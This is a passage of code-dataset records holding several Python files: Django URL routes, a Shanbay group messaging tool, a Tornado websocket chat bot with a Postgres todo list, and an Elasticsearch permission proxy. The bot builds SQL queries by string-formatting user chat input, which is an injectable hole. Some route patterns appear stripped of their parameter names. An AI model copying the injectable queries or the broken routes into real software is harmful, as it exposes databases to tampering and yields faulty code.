"usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 69, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 69, "usage_type": "name"}, {"api_name": "telegram.InlineQueryResultArticle", "line_number": 76, "usage_type": "call"}, {"api_name": "uuid.uuid4", "line_number": 77, "usage_type": "call"}, {"api_name": "telegram.InputTextMessageContent", "line_number": 83, "usage_type": "call"}, {"api_name": "telegram.utils.helpers.escape_markdown", "line_number": 85, "usage_type": "call"}, {"api_name": "telegram.ParseMode.MARKDOWN", "line_number": 87, "usage_type": "attribute"}, {"api_name": "telegram.ParseMode", "line_number": 87, "usage_type": "name"}, {"api_name": "telegram.InlineKeyboardMarkup", "line_number": 89, "usage_type": "call"}, {"api_name": "telegram.InlineKeyboardButton", "line_number": 91, "usage_type": "call"}, {"api_name": "pony.orm.db_session", "line_number": 40, "usage_type": "attribute"}, {"api_name": "pony.orm", "line_number": 40, "usage_type": "name"}]} +{"seq_id": "23242111", "text": "from django.conf.urls import url\n\nfrom . import views\n\nurlpatterns = [\n url(r'(?P\\d+)/(?P\\d+)/$',views.step_detail,\n name='step'),\n url(r'^$', views.guide_list, name='list'),\n url(r'(?P\\d+)/$', views.guide_detail, name='detail'),\n]", "sub_path": "rdp/guides/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 269, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "django.conf.urls.url", "line_number": 6, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 8, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 9, "usage_type": "call"}]} +{"seq_id": "117673777", "text": "# -*- coding: utf-8 -*-\nimport logging\nimport os\nimport random\nfrom xml.etree import ElementTree\n\nfrom common import Checker, HOME\nfrom conf import TemplateParser\nfrom shanbay.util import open_file, console, ask\n\n\nclass MsgTool(Checker):\n def __init__(self):\n Checker.__init__(self)\n self.START_PROMPT = '========================= 短信工具开始 ========================='\n self.END_PROMPT = '========================= 短信工具结束 ========================='\n self.DIR = os.path.join(HOME, 'data/msg_tool/%s' % self.TODAY_STR)\n self.LOG = os.path.join(self.DIR, '%s_msg_tool.txt' % self.TODAY_STR)\n self.MAKO = os.path.abspath(os.path.join(HOME, 'bin/etc/msg_tool.mako'))\n\n self.input_txt = os.path.abspath(os.path.join(HOME, 'user/input.txt'))\n self.xml = os.path.abspath(os.path.join(HOME, 'user/msg_tool.xml'))\n self.mode = 1\n\n # “踢人并发送短信”模式用\n self.statistic = {}\n self.email_content = ''\n self.HTML = os.path.abspath(os.path.join(self.DIR, '%s_msg_tool.html' % self.NOW_STR))\n self.EMAIL_SUBJECT = '【兰芷馥郁】管理踢人报表'\n\n def main(self):\n # noinspection PyBroadException\n try:\n self.set_logger()\n self.login_prepare()\n self.select_mode()\n if self.mode == 1:\n self.send_all_process()\n elif self.mode == 2:\n self.send_part_process()\n elif self.mode == 3:\n self.dispel_with_msg()\n except Exception as e:\n logging.exception(e)\n self.quit()\n\n def login_prepare(self):\n # 在载入模板前进行一些初始化工作\n # 检查xml存在性,若不存在从data目录复制\n if not os.path.exists(self.xml):\n import shutil\n shutil.copy(os.path.abspath(os.path.join(HOME, 'data', 'msg_tool.xml')), self.xml)\n # 检查txt存在性,若不存在新建个,若存在则清空\n with open(self.input_txt, 'w'):\n pass\n # 显示开始,加载模板\n console(self.START_PROMPT)\n self.load_templates()\n\n def load_templates(self):\n \"\"\"\n 加载短信模板\n \"\"\"\n if self.xml:\n try:\n if isinstance(self.xml, str):\n self.templates = TemplateParser(self.xml)\n elif isinstance(self.xml, (list, tuple)):\n self.templates = TemplateParser(*self.xml)\n # 若解析失败,给出友好提示\n except ElementTree.ParseError:\n msg = '''msg_tool.xml解析失败!请检查如下:\n1、短信的标题和内容是否含有<或&\n2、XML的结构是否正确\n对于1,请按如下规则进行替换或不使用这些字符:\n<替换为< &替换为&\n对于2,请参考data目录下的XML结构'''\n console(msg)\n self.quit()\n\n def select_mode(self):\n modes = [\n '发送全员通知',\n '指定用户ID群发',\n '踢人并发送短信',\n ]\n for i, m in enumerate(modes):\n console('%d -> %s' % (i + 1, m))\n ans = ask('请选择:', [1, 2, 3], '输入有误,请重新输入!')\n self.mode = int(ans)\n\n def get_members(self):\n for mbr in self.get_rest_members():\n self.members[mbr.user_id] = mbr\n print()\n\n def send_all_process(self):\n def preview(mid):\n # 重新载入短信模板并向自己发短信预览\n self.load_templates()\n self.members[mid]['remark'] = ['all']\n self.send_msgs('all')\n console('已向自己发送短信,请打开扇贝进行预览。')\n del self.members[mid]['remark']\n\n # 检查短信模板中是否存在all标记\n if not hasattr(self.templates, 'all'):\n console('短信模板中无all标记!')\n return False\n # 获取所有成员\n self.login_process()\n self.get_members()\n # 向自己发短信进行预览\n my_uid = __class__.my_info().user_id\n preview(my_uid)\n while True:\n yrn = ask('接下来,y-继续(默认),r-重新载入短信模板,n-取消。请选择:', '[yYrRnN]|', '无此选项')\n if yrn.lower() in ('y', 'n', ''):\n break\n else:\n preview(my_uid)\n if yrn.lower() == 'n':\n return False\n # 验证码确认\n vn = '%04d' % random.randint(0, 9999)\n ask('请输入验证码(%s)以确认本次操作:' % vn, vn, '验证码输入错误!')\n # 添加标记并发送短信\n for uid, mbr in self.members.items():\n mbr['remark'] = ['all']\n self.send_msgs('all')\n\n def input_prepare(self, uids):\n def load_input(ids):\n _flag = True\n for _id in open(self.input_txt):\n _id = _id.strip()\n if _id:\n _id = int(_id)\n if _id not in list(self.members.keys()):\n _flag = False\n console('用户ID %-10s 不存在,请检查!(注意是用户ID,不是踢人ID或用户名)' % _id)\n else:\n ids.append(_id)\n return _flag\n\n # 清空input.txt\n with open(self.input_txt, 'w'):\n pass\n # 使用默认程序打开txt\n open_file(self.input_txt)\n # 确认以继续\n input('请将用户ID复制至input.txt,每行一个,保存。在此处按Enter继续:')\n # 对用户ID进行检查\n while True:\n uids.clear()\n fg = load_input(uids)\n if not fg:\n input('input.txt中存在错误用户ID,请检查并修改。确认无误后在此处按Enter继续:')\n continue\n if not uids:\n input('input.txt没有数据,是不是没有保存?请保存后在此处按Enter继续:')\n continue\n if fg and uids:\n break\n\n def send_remark_msg(self, uids):\n # 选择短信模板\n self.load_templates()\n rks = []\n for r in self.templates:\n rk = getattr(self.templates, r)\n rks.append(rk)\n console('%d. %-20s| %s' %\n (len(rks), rk.name, rk.attr.get('description') if 'description' in rk.attr else ''))\n # fix #50 选择发送的短信模板时,可以选择不发送\n ans = ask('请输入编号以选择短信模板(n-取消/不发送,r-重新选择短信模板):', '\\d+|[nNrR]', '无效选择')\n if ans in ('r', 'R'):\n return self.send_remark_msg(uids)\n if ans in ('n', 'N'):\n return False\n idx = int(ans) - 1\n # 预览模板并确认发送\n console('-------------------- 模板预览 --------------------')\n if not rks[idx]:\n console('未发现可用的短信模板!')\n return False\n mt = rks[idx].tmpl[0]\n # 预览第一个\n mt.para = self.members[uids[0]]\n console(mt.subject)\n console(mt.body)\n yn = ask('将要给 %d 人发送短信,y-确认(默认),n-取消/不发送,r-重新选择短信模板:' % len(uids), '[yYnNrR]|', '无效选项')\n if yn.lower() in ('', 'y'):\n # 添加标记\n for uid in uids:\n self.members[uid]['remark'] = [rks[idx].name]\n self.send_msgs(rks[idx].name)\n # 清理标记\n for uid in uids:\n del self.members[uid]['remark']\n elif yn.lower() == 'r':\n return self.send_remark_msg(uids)\n\n def send_part_sub(self):\n uids = []\n self.input_prepare(uids)\n self.send_remark_msg(uids)\n\n def send_part_process(self):\n # 获取所有成员\n self.login_process()\n self.get_members()\n self.send_part_sub()\n while ask('接下来,y-重复以上流程,n-取消(默认):', '[yYnN]|').lower() == 'y':\n self.send_part_sub()\n\n def show_dispel(self, uids):\n console('************************ 待踢成员列表 ************************')\n console(' 用户ID 贡献值 组龄 贡献率 昵称')\n console('----------------------------------------------------------------')\n for uid in uids:\n mbr = self.members[uid]\n console('{user_id:<10} {points:<5} {days:<4} {point_rate:<5} {nickname}'.format(**mbr))\n\n def dispel_with_msg(self):\n # 获取所有成员\n self.login_process()\n self.get_members()\n uids = []\n self.input_prepare(uids)\n # 显示待踢成员详情\n self.show_dispel(uids)\n # 验证码确认\n vn = '%04d' % random.randint(0, 9999)\n ask('共 %d 人,请输入验证码(%s)以确认踢出:' % (len(uids), vn), vn, '验证码输入错误!')\n # 踢出\n self.dispel = uids\n self.dispel_process()\n # 发送短信\n self.xml = [os.path.abspath(os.path.join(HOME, 'bin/etc/plan_check.xml')),\n os.path.abspath(os.path.join(HOME, 'user/msg_tool.xml'))]\n self.load_templates()\n self.send_remark_msg(uids)\n # 发送邮件\n self.render_html()\n self.send_email()\n\n\nif __name__ == '__main__':\n MsgTool().main()\n", "sub_path": "bin/msg_tool.py", "file_name": "msg_tool.py", "file_ext": "py", "file_size_in_byte": 9597, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "common.Checker", "line_number": 12, "usage_type": "name"}, {"api_name": "common.Checker.__init__", "line_number": 14, "usage_type": "call"}, {"api_name": "common.Checker", "line_number": 14, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 17, "usage_type": "call"}, {"api_name": "common.HOME", "line_number": 17, "usage_type": "argument"}, {"api_name": "os.path", "line_number": 17, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 18, "usage_type": "call"}, {"api_name": "os.path", "line_number": 18, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 19, "usage_type": "call"}, {"api_name": "os.path", "line_number": 19, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 19, "usage_type": "call"}, {"api_name": "common.HOME", "line_number": 19, "usage_type": "argument"}, {"api_name": "os.path.abspath", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path", "line_number": 21, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 21, "usage_type": "call"}, {"api_name": "common.HOME", "line_number": 21, "usage_type": "argument"}, {"api_name": "os.path.abspath", "line_number": 22, "usage_type": "call"}, {"api_name": "os.path", "line_number": 22, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 22, "usage_type": "call"}, {"api_name": "common.HOME", "line_number": 22, "usage_type": "argument"}, {"api_name": "os.path.abspath", "line_number": 28, "usage_type": "call"}, {"api_name": "os.path", "line_number": 28, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 28, "usage_type": "call"}, {"api_name": "logging.exception", "line_number": 44, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 50, "usage_type": "call"}, {"api_name": "os.path", "line_number": 50, "usage_type": "attribute"}, {"api_name": "shutil.copy", "line_number": 52, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 52, "usage_type": "call"}, {"api_name": "os.path", "line_number": 52, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 52, "usage_type": "call"}, {"api_name": "common.HOME", "line_number": 52, "usage_type": "argument"}, {"api_name": "shanbay.util.console", "line_number": 57, "usage_type": "call"}, {"api_name": "conf.TemplateParser", "line_number": 67, "usage_type": "call"}, {"api_name": "conf.TemplateParser", "line_number": 69, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree.ParseError", "line_number": 71, "usage_type": "attribute"}, {"api_name": "xml.etree.ElementTree", "line_number": 71, "usage_type": "name"}, {"api_name": "shanbay.util.console", "line_number": 78, "usage_type": "call"}, {"api_name": "shanbay.util.console", "line_number": 88, "usage_type": "call"}, {"api_name": "shanbay.util.ask", "line_number": 89, "usage_type": "call"}, {"api_name": "shanbay.util.console", "line_number": 103, "usage_type": "call"}, {"api_name": "shanbay.util.console", "line_number": 108, "usage_type": "call"}, {"api_name": "shanbay.util.ask", "line_number": 117, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 125, "usage_type": "call"}, {"api_name": "shanbay.util.ask", "line_number": 126, "usage_type": "call"}, {"api_name": "shanbay.util.console", "line_number": 141, "usage_type": "call"}, {"api_name": "shanbay.util.open_file", "line_number": 150, "usage_type": "call"}, {"api_name": "shanbay.util.console", "line_number": 173, "usage_type": "call"}, {"api_name": "shanbay.util.ask", "line_number": 176, "usage_type": "call"}, {"api_name": "shanbay.util.console", "line_number": 183, "usage_type": "call"}, {"api_name": "shanbay.util.console", "line_number": 185, "usage_type": "call"}, {"api_name": "shanbay.util.console", "line_number": 190, "usage_type": "call"}, {"api_name": "shanbay.util.console", "line_number": 191, "usage_type": "call"}, {"api_name": "shanbay.util.ask", "line_number": 192, "usage_type": "call"}, {"api_name": "shanbay.util.ask", "line_number": 214, "usage_type": "call"}, {"api_name": "shanbay.util.console", "line_number": 218, "usage_type": "call"}, {"api_name": "shanbay.util.console", "line_number": 219, "usage_type": "call"}, {"api_name": "shanbay.util.console", "line_number": 220, "usage_type": "call"}, {"api_name": "shanbay.util.console", "line_number": 223, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 234, "usage_type": "call"}, {"api_name": "shanbay.util.ask", "line_number": 235, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 240, "usage_type": "call"}, {"api_name": "os.path", "line_number": 240, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 240, "usage_type": "call"}, {"api_name": "common.HOME", "line_number": 240, "usage_type": "argument"}, {"api_name": "os.path.abspath", "line_number": 241, "usage_type": "call"}, {"api_name": "os.path", "line_number": 241, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 241, "usage_type": "call"}, {"api_name": "common.HOME", "line_number": 241, "usage_type": "argument"}]} +{"seq_id": "260850306", "text": "import json\nimport time\nimport tornado.ioloop\nimport tornado.web\nimport tornado.websocket\nfrom bot import *\nfrom tornado.ioloop import PeriodicCallback\nfrom tornado.options import define, options, parse_command_line\nimport urllib.parse\nimport psycopg2\nimport os\nimport re\nis_zero = False\n\nclient = set()\n\nurllib.parse.uses_netloc.append(\"postgres\")\nurl = urllib.parse.urlparse(os.environ[\"DATABASE_URL\"])\nconnector = psycopg2.connect(\n database=url.path[1:],\n user=url.username,\n password=url.password,\n host=url.hostname,\n port=url.port\n)\ncur = connector.cursor()\nZERO = ord(\"0\")\nNINE = ord(\"9\")\ndefine(\"port\", default = 8080, help = \"run on the given port\", type = int)\n\nclass IndexHandler(tornado.web.RequestHandler):\n @tornado.web.asynchronous\n def get(self):\n self.render(\"index.html\")\n\nclass SendWebSocket(tornado.websocket.WebSocketHandler):\n def open(self):\n client.add(self)\n print(\"WebSocket opened\") \n\n def on_message(self, message):\n global is_zero\n receive = \"\"\n data = {}\n data['data'] = message\n print(data)\n [ws.write_message(json.dumps(data)) for ws in client]\n if message.startswith(\"bot\"):\n commands = message.split()\n if len(commands) == 2:\n if commands[1] == \"ping\":\n data['data'] = \"pong\"\n [ws.write_message(json.dumps(data)) for ws in client]\n command = {}\n if len(commands) == 3:\n if commands[1] == \"todo\" and commands[2] == \"list\":\n cur.execute(\"select name, content from todo\")\n result = cur.fetchall()\n if len(result)==0:\n receive = \"todo empty\"\n else:\n receive = \"\\n\".join([n+\" \"+c for n, c in [row for row in result]])\n data['data'] = receive\n [ws.write_message(json.dumps(data)) for ws in client]\n elif commands[1] != \"calc\":\n command['command'] = commands[1]\n command['data'] = commands[2]\n bot = Bot(command)\n bot.generate_hash()\n data['data'] = bot.hash\n [ws.write_message(json.dumps(data)) for ws in client]\n if len(commands) >= 3:\n if commands[1] == \"calc\":\n data['data'] = calc(\"\".join(commands[2:]))\n if is_zero:\n data['data'] = \"ERROR: division by zero\"\n [ws.write_message(json.dumps(data)) for ws in client]\n is_zero = False\n if len(commands) == 4:\n if commands[1] == \"todo\" and commands[2] == \"delete\":\n cur.execute(\"delete from todo where name='%s'\" % commands[3])\n connector.commit()\n status, num = cur.statusmessage.split()\n if status == \"DELETE\" and int(num) > 0:\n data['data'] = \"todo deleted\"\n [ws.write_message(json.dumps(data)) for ws in client]\n if len(commands) >= 5:\n if commands[1] == \"todo\" and commands[2] == \"add\":\n cur.execute(\"insert into todo values('%s','%s')\" % (commands[3], \" \".join(commands[4:])))\n connector.commit()\n status, num1, num2 = cur.statusmessage.split()\n if status == \"INSERT\" and int(num2) > 0:\n data['data'] = \"todo added\"\n [ws.write_message(json.dumps(data)) for ws in client]\n\n def on_close(self):\n client.remove(self)\n print(\"WebSocket closed\")\n\napp = tornado.web.Application([\n (r\"/index\", IndexHandler),\n (r\"/\", SendWebSocket),\n],\ntemplate_path=os.path.join(os.getcwd(), \"templates\"),\nstatic_path=os.path.join(os.getcwd(), \"static\"),\n)\n\ndef paren(st):\n if st[0] == \"(\":\n ans, idx = first(st[1:])\n return ans, idx+2\n elif ZERO <= ord(st[0]) <= NINE:\n i = 1\n while i < len(st) and ZERO <= ord(st[i]) <= NINE:\n i += 1\n return int(st[:i]), i\n return 0, 0\n\ndef second(st):\n global is_zero\n ans, idx = paren(st)\n\n i = idx\n while i < len(st):\n if st[i] == \"*\":\n tmp, idx = paren(st[i+1:])\n ans *= tmp\n i += idx+1\n elif st[i] == \"/\":\n tmp, idx = paren(st[i+1:])\n if tmp == 0:\n is_zero = True\n else:\n ans /= tmp\n i += idx+1\n elif st[i] == \"%\":\n tmp, idx = paren(st[i+1:])\n if tmp == 0:\n is_zero = True\n else:\n ans %= tmp\n i += idx+1\n elif st[i] == \"^\":\n tmp, idx = paren(st[i+1:])\n ans = pow(ans,tmp)\n i += idx+1\n else:\n return ans, i\n return ans, i\n\ndef first(st):\n ans, idx = second(st)\n\n i = idx\n while i < len(st):\n if st[i] == \"+\":\n tmp, idx = second(st[i+1:])\n ans += tmp\n i += idx+1\n elif st[i] == \"-\":\n tmp, idx = second(st[i+1:])\n ans -= tmp\n i += idx+1\n else:\n return ans, i\n return ans, i\n \ndef calc(s):\n if s.count(\"(\") != s.count(\")\") or re.search(\"[^\\+\\-\\*\\/()0-9^%]\", s):\n return \"ERROR\"\n else:\n return first(s)[0]\n\n\nif __name__ == \"__main__\":\n parse_command_line()\n port = int(os.environ.get(\"PORT\", 5000))\n print(\"Listen :%d\" % port)\n app.listen(port)\n tornado.ioloop.IOLoop.instance().start()", "sub_path": "server.py", "file_name": "server.py", "file_ext": "py", "file_size_in_byte": 5703, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "urllib.parse.parse.uses_netloc.append", "line_number": 17, "usage_type": "call"}, {"api_name": "urllib.parse.parse", "line_number": 17, "usage_type": "attribute"}, {"api_name": "urllib.parse", "line_number": 17, "usage_type": "name"}, {"api_name": "urllib.parse.parse.urlparse", "line_number": 18, "usage_type": "call"}, {"api_name": "urllib.parse.parse", "line_number": 18, "usage_type": "attribute"}, {"api_name": "urllib.parse", "line_number": 18, "usage_type": "name"}, {"api_name": "os.environ", "line_number": 18, "usage_type": "attribute"}, {"api_name": "psycopg2.connect", "line_number": 19, "usage_type": "call"}, {"api_name": "tornado.options.define", "line_number": 29, "usage_type": "call"}, {"api_name": "tornado.ioloop.web", "line_number": 31, "usage_type": "attribute"}, {"api_name": "tornado.ioloop", "line_number": 31, "usage_type": "name"}, {"api_name": "tornado.ioloop.web", "line_number": 32, "usage_type": "attribute"}, {"api_name": "tornado.ioloop", "line_number": 32, "usage_type": "name"}, {"api_name": "tornado.ioloop.websocket", "line_number": 36, "usage_type": "attribute"}, {"api_name": "tornado.ioloop", "line_number": 36, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 47, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 53, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 64, "usage_type": "call"}, {"api_name": "bot.generate_hash", "line_number": 69, "usage_type": "call"}, {"api_name": "bot.hash", "line_number": 70, "usage_type": "attribute"}, {"api_name": "json.dumps", "line_number": 71, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 77, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 86, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 94, "usage_type": "call"}, {"api_name": "tornado.ioloop.web.Application", "line_number": 100, "usage_type": "call"}, {"api_name": "tornado.ioloop.web", "line_number": 100, "usage_type": "attribute"}, {"api_name": "tornado.ioloop", "line_number": 100, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 104, "usage_type": "call"}, {"api_name": "os.path", "line_number": 104, "usage_type": "attribute"}, {"api_name": "os.getcwd", "line_number": 104, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 105, "usage_type": "call"}, {"api_name": "os.path", "line_number": 105, "usage_type": "attribute"}, {"api_name": "os.getcwd", "line_number": 105, "usage_type": "call"}, {"api_name": "re.search", "line_number": 169, "usage_type": "call"}, {"api_name": "tornado.options.parse_command_line", "line_number": 176, "usage_type": "call"}, {"api_name": "os.environ.get", "line_number": 177, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 177, "usage_type": "attribute"}, {"api_name": "tornado.ioloop.ioloop.IOLoop.instance", "line_number": 180, "usage_type": "call"}, {"api_name": "tornado.ioloop.ioloop", "line_number": 180, "usage_type": "attribute"}, {"api_name": "tornado.ioloop", "line_number": 180, "usage_type": "name"}]} +{"seq_id": "234827242", "text": "__author__ = 'schlitzer'\n\nfrom bottle import request\nimport requests\n\nfrom el_aap.app import app, str_index, endpoint\nfrom el_aap_api.errors import *\n\n\n@app.put('/_template')\n@app.put('/_warmer')\ndef admin_put(m_aa):\n m_aa.require_permission(':', '')\n r = requests.put(\n url=endpoint.endpoint+request.path,\n params=request.query,\n data=request.body\n )\n response.status = r.status_code\n response.set_header('charset', 'UTF8')\n return r.json()\n\n\n@app.put(str_index+'/_warmer')\n@app.put(str_index+'/<_type>/_warmer')\n@app.put(str_index)\n@app.put(str_index+'/')\n@app.put(str_index+'/_mapping/<_type>')\n@app.put(str_index+'/_settings')\ndef put(m_aa, _index, _type=None):\n m_aa.require_permission(':index:manage:', _index)\n r = requests.put(\n url=endpoint.endpoint+request.path,\n params=request.query,\n data=request.body\n )\n response.status = r.status_code\n response.set_header('charset', 'UTF8')\n return r.json()\n\n\n@app.post('/_flush')\n@app.post('/_forcemerge')\n@app.post('/_optimize')\n@app.post('/_refresh')\n@app.post('/_cache/clear')\ndef post(m_aa):\n m_aa.require_permission(':', '')\n r = requests.post(\n url=endpoint.endpoint+request.path,\n params=request.query,\n data=request.body\n )\n response.status = r.status_code\n response.set_header('charset', 'UTF8')\n return r.json()\n\n\n@app.post(str_index+'')\n@app.post(str_index+'/')\n@app.post(str_index+'/_cache/clear')\n@app.post(str_index+'/_flush')\n@app.post(str_index+'/_refresh')\n@app.post(str_index+'/_optimize')\n@app.post(str_index+'/_upgrade')\n@app.post(str_index+'/_close')\n@app.post(str_index+'/_open')\n@app.post(str_index+'/_forcemerge')\ndef post(m_aa, _index):\n m_aa.require_permission(':index:manage:', _index)\n r = requests.post(\n url=endpoint.endpoint+request.path,\n params=request.query,\n data=request.body\n )\n response.status = r.status_code\n response.set_header('charset', 'UTF8')\n return r.json()\n\n\n@app.delete(str_index+'')\n@app.delete(str_index+'/')\ndef delete(m_aa, _index):\n for index in _index.split(','):\n m_aa.require_permission(':index:manage:', index)\n r = requests.delete(\n url=endpoint.endpoint+request.path,\n params=request.query,\n data=request.body\n )\n response.status = r.status_code\n response.set_header('charset', 'UTF8')\n return r.json()\n\n\n@app.get('/_analyze')\n@app.get('/_mapping')\n@app.get('/_segments')\n@app.get('/_recovery')\n@app.get('/_shard_stores')\n@app.get('/_stats')\n@app.get('/_stats/')\n@app.get('/_stats/')\n@app.get('/_template/')\n@app.get('/_all/_mapping')\n@app.get('/_all/_settings')\n@app.get('/_all/_settings/')\n@app.get(str_index+'/_mapping')\n@app.get(str_index+'/_mapping/')\n@app.get(str_index+'/')\n@app.get(str_index+'/_settings')\n@app.get(str_index+'/_settings/)')\ndef info(m_aa, _index, dummy=None):\n for index in _index.split(','):\n m_aa.require_permission(':index:manage:monitor', index)\n r = requests.get(\n url=endpoint.endpoint+request.path,\n params=request.query,\n )\n response.status = r.status_code\n response.set_header('charset', 'UTF8')\n return r.json()\n\n\n", "sub_path": "el_aap/controllers/index_api.py", "file_name": "index_api.py", "file_ext": "py", "file_size_in_byte": 3958, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "requests.put", "line_number": 14, "usage_type": "call"}, {"api_name": "el_aap.app.endpoint.endpoint", "line_number": 15, "usage_type": "attribute"}, {"api_name": "el_aap.app.endpoint", "line_number": 15, "usage_type": "name"}, {"api_name": "bottle.request.path", "line_number": 15, "usage_type": "attribute"}, {"api_name": "bottle.request", "line_number": 15, "usage_type": "name"}, {"api_name": "bottle.request.query", "line_number": 16, "usage_type": "attribute"}, {"api_name": "bottle.request", "line_number": 16, "usage_type": "name"}, {"api_name": "bottle.request.body", "line_number": 17, "usage_type": "attribute"}, {"api_name": "bottle.request", "line_number": 17, "usage_type": "name"}, {"api_name": "el_aap.app.app.put", "line_number": 10, "usage_type": "call"}, {"api_name": "el_aap.app.app", "line_number": 10, "usage_type": "name"}, {"api_name": "el_aap.app.app.put", "line_number": 11, "usage_type": "call"}, {"api_name": "el_aap.app.app", "line_number": 11, "usage_type": "name"}, {"api_name": "requests.put", "line_number": 32, "usage_type": "call"}, {"api_name": "el_aap.app.endpoint.endpoint", "line_number": 33, "usage_type": "attribute"}, {"api_name": "el_aap.app.endpoint", "line_number": 33, "usage_type": "name"}, {"api_name": "bottle.request.path", "line_number": 33, "usage_type": "attribute"}, {"api_name": "bottle.request", "line_number": 33, "usage_type": "name"}, {"api_name": "bottle.request.query", "line_number": 34, "usage_type": "attribute"}, {"api_name": "bottle.request", "line_number": 34, "usage_type": "name"}, {"api_name": "bottle.request.body", "line_number": 35, "usage_type": "attribute"}, {"api_name": "bottle.request", "line_number": 35, "usage_type": "name"}, {"api_name": "el_aap.app.app.put", "line_number": 24, "usage_type": "call"}, {"api_name": "el_aap.app.app", "line_number": 24, "usage_type": "name"}, {"api_name": "el_aap.app.str_index", "line_number": 24, "usage_type": "name"}, {"api_name": "el_aap.app.app.put", "line_number": 25, "usage_type": "call"}, {"api_name": "el_aap.app.app", "line_number": 25, "usage_type": "name"}, {"api_name": "el_aap.app.str_index", "line_number": 25, "usage_type": "name"}, {"api_name": "el_aap.app.app.put", "line_number": 26, "usage_type": "call"}, {"api_name": "el_aap.app.str_index", "line_number": 26, "usage_type": "argument"}, {"api_name": "el_aap.app.app", "line_number": 26, "usage_type": "name"}, {"api_name": "el_aap.app.app.put", "line_number": 27, "usage_type": "call"}, {"api_name": "el_aap.app.app", "line_number": 27, "usage_type": "name"}, {"api_name": "el_aap.app.str_index", "line_number": 27, "usage_type": "name"}, {"api_name": "el_aap.app.app.put", "line_number": 28, "usage_type": "call"}, {"api_name": "el_aap.app.app", "line_number": 28, "usage_type": "name"}, {"api_name": "el_aap.app.str_index", "line_number": 28, "usage_type": "name"}, {"api_name": "el_aap.app.app.put", "line_number": 29, "usage_type": "call"}, {"api_name": "el_aap.app.app", "line_number": 29, "usage_type": "name"}, {"api_name": "el_aap.app.str_index", "line_number": 29, "usage_type": "name"}, {"api_name": "requests.post", "line_number": 49, "usage_type": "call"}, {"api_name": "el_aap.app.endpoint.endpoint", "line_number": 50, "usage_type": "attribute"}, {"api_name": "el_aap.app.endpoint", "line_number": 50, "usage_type": "name"}, {"api_name": "bottle.request.path", "line_number": 50, "usage_type": "attribute"}, {"api_name": "bottle.request", "line_number": 50, "usage_type": "name"}, {"api_name": "bottle.request.query", "line_number": 51, "usage_type": "attribute"}, {"api_name": "bottle.request", "line_number": 51, "usage_type": "name"}, {"api_name": "bottle.request.body", "line_number": 52, "usage_type": "attribute"}, {"api_name": "bottle.request", "line_number": 52, "usage_type": "name"}, {"api_name": "el_aap.app.app.post", "line_number": 42, "usage_type": "call"}, {"api_name": "el_aap.app.app", "line_number": 42, "usage_type": "name"}, {"api_name": "el_aap.app.app.post", "line_number": 43, "usage_type": "call"}, {"api_name": "el_aap.app.app", "line_number": 43, "usage_type": "name"}, {"api_name": "el_aap.app.app.post", "line_number": 44, "usage_type": "call"}, {"api_name": "el_aap.app.app", "line_number": 44, "usage_type": "name"}, {"api_name": "el_aap.app.app.post", "line_number": 45, "usage_type": "call"}, {"api_name": "el_aap.app.app", "line_number": 45, "usage_type": "name"}, {"api_name": "el_aap.app.app.post", "line_number": 46, "usage_type": "call"}, {"api_name": "el_aap.app.app", "line_number": 46, "usage_type": "name"}, {"api_name": "requests.post", "line_number": 71, "usage_type": "call"}, {"api_name": "el_aap.app.endpoint.endpoint", "line_number": 72, "usage_type": "attribute"}, {"api_name": "el_aap.app.endpoint", "line_number": 72, "usage_type": "name"}, {"api_name": "bottle.request.path", "line_number": 72, "usage_type": "attribute"}, {"api_name": "bottle.request", "line_number": 72, "usage_type": "name"}, {"api_name": "bottle.request.query", "line_number": 73, "usage_type": "attribute"}, {"api_name": "bottle.request", "line_number": 73, "usage_type": "name"}, {"api_name": "bottle.request.body", "line_number": 74, "usage_type": "attribute"}, {"api_name": "bottle.request", "line_number": 74, "usage_type": "name"}, {"api_name": "el_aap.app.app.post", "line_number": 59, "usage_type": "call"}, {"api_name": "el_aap.app.app", "line_number": 59, "usage_type": "name"}, {"api_name": "el_aap.app.str_index", "line_number": 59, "usage_type": "name"}, {"api_name": "el_aap.app.app.post", "line_number": 60, "usage_type": "call"}, {"api_name": "el_aap.app.app", "line_number": 60, "usage_type": "name"}, {"api_name": "el_aap.app.str_index", "line_number": 60, "usage_type": "name"}, {"api_name": "el_aap.app.app.post", "line_number": 61, "usage_type": "call"}, {"api_name": "el_aap.app.app", "line_number": 61, "usage_type": "name"}, {"api_name": "el_aap.app.str_index", "line_number": 61, "usage_type": "name"}, 